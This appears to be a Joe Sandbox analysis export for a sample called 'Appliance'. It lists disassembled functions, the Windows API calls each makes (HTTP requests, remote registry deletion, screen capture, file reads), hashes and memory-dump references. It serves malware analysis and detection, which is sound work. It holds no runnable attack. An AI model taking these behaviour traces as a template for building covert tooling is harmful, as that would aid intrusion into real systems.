Opcode ID: 9c579365fa9605a4c53f6547fe719d193a4d8b7f0ae9395f5c25aa39810f169c
Instruction ID: b83de01aaad6ce63e01553218a53f57f6d81dca855c1f044dd0ced148337093e
Opcode Fuzzy Hash: 9c579365fa9605a4c53f6547fe719d193a4d8b7f0ae9395f5c25aa39810f169c
Instruction Fuzzy Hash: 7D123CB1A00205EFDB14DF94D884FAEBBB5FF45318F149098E915AB291D731ED46CBA0

Function 00DC381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00E929C0), ref: 00E03F72
GetMenuItemCount.USER32(00E929C0), ref: 00E04022
GetCursorPos.USER32(?), ref: 00E04066
SetForegroundWindow.USER32(00000000), ref: 00E0406F
TrackPopupMenuEx.USER32(00E929C0,00000000,?,00000000,00000000,00000000), ref: 00E04082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E0408E

Strings

0, xrefs: 00DC382D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: ad96ff89216d78f0ef7355acc7aabae1c19fe11b6396016e28c521054292254f
Instruction ID: 45fac88943343cdd72b3b420e41d5b0a7c89df22582c85bfc7826b5525f67edb
Opcode Fuzzy Hash: ad96ff89216d78f0ef7355acc7aabae1c19fe11b6396016e28c521054292254f
Instruction Fuzzy Hash: 13710670644306BEEB319F69DC49FAABF68FF04368F10420AF614B61E1C7B19954DB51

Function 00E57711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00E57823

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E57897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E578B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E578CC
DestroyWindow.USER32(?), ref: 00E578ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DC0000,00000000), ref: 00E5791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E57935
GetDesktopWindow.USER32 ref: 00E5794E
GetWindowRect.USER32(00000000), ref: 00E57955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E5796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E57985

Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242

Strings

0, xrefs: 00E577D0
tooltips_class32, xrefs: 00E57890, 00E57915

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 909d7c734207e8d813b2861dc41f442db90ffeed84ae48374d27ac103907f3e0
Instruction ID: 82cfb12def3b238f5262d3c5d6d363e1aaf9e52920b792fd122e764fd1b93487
Opcode Fuzzy Hash: 909d7c734207e8d813b2861dc41f442db90ffeed84ae48374d27ac103907f3e0
Instruction Fuzzy Hash: 11718970108345AFD725CF19DC48F6ABBF9EBC9305F04581EF985A7261C770A91ACB61

Function 00DC146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DC1488,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00DC1865

DestroyWindow.USER32(?), ref: 00DC1521
KillTimer.USER32(00000000,?,?,?,?,00DC145A,00000000,?), ref: 00DC15BB
DestroyAcceleratorTable.USER32(00000000), ref: 00E029B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00E029E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00E029F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DC145A,00000000), ref: 00E02A15
DeleteObject.GDI32(00000000), ref: 00E02A27

Strings

<), xrefs: 00DC15E0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)
API String ID: 641708696-200976629
Opcode ID: 52b86dc0a6ba009f38e809fe95f5d381d86b5fdad95d04c0e3a173b0683afd49
Instruction ID: f46a1ccdb0c019bb0d1e80f6af0b119d2ebb11e342566b484d2e833c2076ff8b
Opcode Fuzzy Hash: 52b86dc0a6ba009f38e809fe95f5d381d86b5fdad95d04c0e3a173b0683afd49
Instruction Fuzzy Hash: D761AD34605722EFCB398F15C948F2977F1FB81326F14541EE182A76A1C770E899CB60

Function 00E3CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E3CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E3CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E3CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E3CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E3CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E3CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E3CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E3CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E3D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E3D035
InternetCloseHandle.WININET(00000000), ref: 00E3D040

Strings

, xrefs: 00E3CFBA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: ad756fd1af6472993d8b547242f1e4911b0fa5e4885bfc605114c7187dde7737
Instruction ID: 345e30fb9529bafe8197bc8fcf65691d1526e72a007644ba90184252df0185ac
Opcode Fuzzy Hash: ad756fd1af6472993d8b547242f1e4911b0fa5e4885bfc605114c7187dde7737
Instruction Fuzzy Hash: 355198B1604708BFDB259F61DC88AAA7FFDFF08749F10581AF945A6210D730D949EB60

Function 00E58FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E566D6,?,?), ref: 00E58FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E58FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59009
CloseHandle.KERNEL32(00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59016
GlobalLock.KERNEL32(00000000), ref: 00E59024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59033
GlobalUnlock.KERNEL32(00000000), ref: 00E5903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00E60C04,?), ref: 00E5906D
GlobalFree.KERNEL32(00000000), ref: 00E5907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00E5909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E590CD
DeleteObject.GDI32(00000000), ref: 00E590F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E5910B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 66f10afaf37b760f1682b0afc930fa2dd3e0a1d5599d21bdd30ab3544b3e6ee6
Instruction ID: 17f3d5d84c848c74fa78393270cca726b9baea711b06450e868a1156a09e913d
Opcode Fuzzy Hash: 66f10afaf37b760f1682b0afc930fa2dd3e0a1d5599d21bdd30ab3544b3e6ee6
Instruction Fuzzy Hash: 7D414975600208FFDB259F66DC48EAABBB8FF89716F104858F905E72A1D7309949DB20

Function 00E4C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E4C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00E4C26A
RegCloseKey.ADVAPI32(?), ref: 00E4C2DE
RegCloseKey.ADVAPI32(?), ref: 00E4C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E4C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E4C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00E4C382
FreeLibrary.KERNEL32(00000000), ref: 00E4C3E3
RegCloseKey.ADVAPI32(00000000), ref: 00E4C3F4

Strings

RegDeleteKeyExW, xrefs: 00E4C35E
advapi32.dll, xrefs: 00E4C34D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 21315173815555c2850bfb6505117c66bafa97d5df597440f169ed6b7594c8a1
Instruction ID: f52a897fa8f9803b6c4990beac420798a460ad4abe4f0df69425dc22c4d1fd41
Opcode Fuzzy Hash: 21315173815555c2850bfb6505117c66bafa97d5df597440f169ed6b7594c8a1
Instruction Fuzzy Hash: E3C18130205202AFD754DF14D885F5ABBE1FF44318F24949CE45A9B3A2CB71EC46CBA1

Function 00E5A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

GetSystemMetrics.USER32(0000000F), ref: 00E5A990
GetSystemMetrics.USER32(00000011), ref: 00E5A9A7
GetSystemMetrics.USER32(00000004), ref: 00E5A9B3
GetSystemMetrics.USER32(0000000F), ref: 00E5A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00E5AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E5AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E5AC54
ShowWindow.USER32(00000003,00000000), ref: 00E5AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00E5AC95
DefDlgProcW.USER32(?,00000005,?), ref: 00E5ACBB

Strings

(, xrefs: 00E5A95B
@, xrefs: 00E5ABD0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(
API String ID: 3962739598-2721164788
Opcode ID: 5032f7df9966c66056d31ca0786dd255251934f366474c82f592adbe7a071136
Instruction ID: bd282328fb314819435893a94a33720a83dc237a6393679a0dbf63e996cacef9
Opcode Fuzzy Hash: 5032f7df9966c66056d31ca0786dd255251934f366474c82f592adbe7a071136
Instruction Fuzzy Hash: D2B19B30600219EFCF14CF69C9847BE7BB2BF44706F18957AED44AB295D770A988CB91

Function 00E5976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E597B6
GetFocus.USER32 ref: 00E597C6
GetDlgCtrlID.USER32(00000000), ref: 00E597D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00E59879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E5992B
GetMenuItemCount.USER32(?), ref: 00E59948
GetMenuItemID.USER32(?,00000000), ref: 00E59958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E5998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E599CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E599FD

Strings

(, xrefs: 00E59779
0, xrefs: 00E598FB

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(
API String ID: 1026556194-1385328161
Opcode ID: 4faf9f62c08fe9d05b1e4bd33d6088a64592e58db9b83ffe450763289b58b800
Instruction ID: 0d71968cdba7aba1e31371c664919353d1e781f791543e712bf06d1f8259e257
Opcode Fuzzy Hash: 4faf9f62c08fe9d05b1e4bd33d6088a64592e58db9b83ffe450763289b58b800
Instruction Fuzzy Hash: 2581BC71508301EFDB24DF25C884AAA7BE8FB89319F041D1DFD85A7292D770D909CBA2

Function 00E42FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E43035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E43045
CreateCompatibleDC.GDI32(?), ref: 00E43051
SelectObject.GDI32(00000000,?), ref: 00E4305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E430CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E43109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E4312D
SelectObject.GDI32(?,?), ref: 00E43135
DeleteObject.GDI32(?), ref: 00E4313E
DeleteDC.GDI32(?), ref: 00E43145
ReleaseDC.USER32(00000000,?), ref: 00E43150

Strings

(, xrefs: 00E430EA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: a4dc19174c9e8099d7cdd6125b2a50fa33ef256c6fdcd74b5c160a3096863e5c
Instruction ID: 156877008cdf7c10c2facd5995fe1f419e277ffa4f0c75733b4d0f17fa8babe9
Opcode Fuzzy Hash: a4dc19174c9e8099d7cdd6125b2a50fa33ef256c6fdcd74b5c160a3096863e5c
Instruction Fuzzy Hash: 1261E1B5D04219AFCB18CFA5DC84AAEBBF6FF48310F208519E555B7250D771AA41CFA0

Function 00E252AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00E252E6
GetWindowTextW.USER32(?,?,00000400), ref: 00E25328
_wcslen.LIBCMT ref: 00E25339
CharUpperBuffW.USER32(?,00000000), ref: 00E25345
_wcsstr.LIBVCRUNTIME ref: 00E2537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00E253B2
GetWindowTextW.USER32(?,?,00000400), ref: 00E253EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00E25445
GetClassNameW.USER32(?,?,00000400), ref: 00E25477
GetWindowRect.USER32(?,?), ref: 00E254EF

Strings

ThumbnailClass, xrefs: 00E253BD, 00E25450

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: cc83323fd5b50bf1763845f24fa9a3ae32d81578a060edc0bc489979caed68a1
Instruction ID: 57ad9b9db5255bef3afa97cc4fb0e70dd8382c626e0a552d8559b5e8992e0150
Opcode Fuzzy Hash: cc83323fd5b50bf1763845f24fa9a3ae32d81578a060edc0bc489979caed68a1
Instruction Fuzzy Hash: 7C911972104B16AFD708DF24EA81BA9B7E9FF00308F005519FA56A3091EB71ED55CB91

Function 00E2C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00E929C0,000000FF,00000000,00000030), ref: 00E2C973
SetMenuItemInfoW.USER32(00E929C0,00000004,00000000,00000030), ref: 00E2C9A8
Sleep.KERNEL32(000001F4), ref: 00E2C9BA
GetMenuItemCount.USER32(?), ref: 00E2CA00
GetMenuItemID.USER32(?,00000000), ref: 00E2CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00E2CA49
GetMenuItemID.USER32(?,?), ref: 00E2CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E2CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E2CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E2CB0C

Strings

0, xrefs: 00E2C904

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 05e1db8c9559736eb7e3cddedf644859362b0f834ff5966c21d3df5d2a547cdd
Instruction ID: b6c0ec1c2c449e675ae1060038947b642a69ec22372864f45c972e94f8c477fb
Opcode Fuzzy Hash: 05e1db8c9559736eb7e3cddedf644859362b0f834ff5966c21d3df5d2a547cdd
Instruction Fuzzy Hash: 3661E2B090026AAFDF25CF64EC89AFE7BB8FB05348F241419E916B3251D771AD44CB61

Function 00E2E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E2E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E2E4FA
_wcslen.LIBCMT ref: 00E2E504
_wcsstr.LIBVCRUNTIME ref: 00E2E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E2E570

Strings

DefaultLangCodepage, xrefs: 00E2E5D3
\VarFileInfo\Translation, xrefs: 00E2E568
StringFileInfo\, xrefs: 00E2E543
04090000, xrefs: 00E2E5A6
%u.%u.%u.%u, xrefs: 00E2E64E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 5acfd2292a162dddadd06c99fbc058533affafdf18ecc29f5901bf2062b38fa6
Instruction ID: 3be66a84c96b7dcb02c7b4c247ab44e89162e2a16c2c14681c35cd5f3419b3cd
Opcode Fuzzy Hash: 5acfd2292a162dddadd06c99fbc058533affafdf18ecc29f5901bf2062b38fa6
Instruction Fuzzy Hash: 3A4142325043247AEB14BB669C47EFF7BACDF55310F10042AF904F6282EBB4DA0192B0

Function 00E4D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E4D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E4D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E4D7A8

Part of subcall function 00E4D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E4D70A
Part of subcall function 00E4D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E4D71D
Part of subcall function 00E4D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E4D72F
Part of subcall function 00E4D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E4D765
Part of subcall function 00E4D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E4D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00E4D753

Strings

RegDeleteKeyExW, xrefs: 00E4D729
advapi32.dll, xrefs: 00E4D718

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

